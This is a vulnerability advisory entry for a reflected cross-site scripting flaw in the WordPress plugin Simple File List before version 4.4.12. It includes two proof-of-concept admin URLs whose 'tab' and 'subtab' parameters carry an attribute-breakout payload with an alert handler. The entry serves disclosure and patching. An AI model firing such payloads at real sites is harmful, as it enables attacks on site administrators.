WordPress Plugin Vulnerabilities
Simple File List < 4.4.12 - Reflected Cross-Site Scripting
Description
The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
Proof of Concept
https://example.com/wp-admin/admin.php?page=ee-simple-file-list&tab="style=animation-name:rotation+onanimationstart=alert(/XSS/)// https://example.com/wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Affects Plugins
Fixed in version 4.4.12
References
Classification
Miscellaneous
Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-08-30 (about 9 months ago)
Added
2022-08-30 (about 9 months ago)
Last Updated
2022-08-30 (about 9 months ago)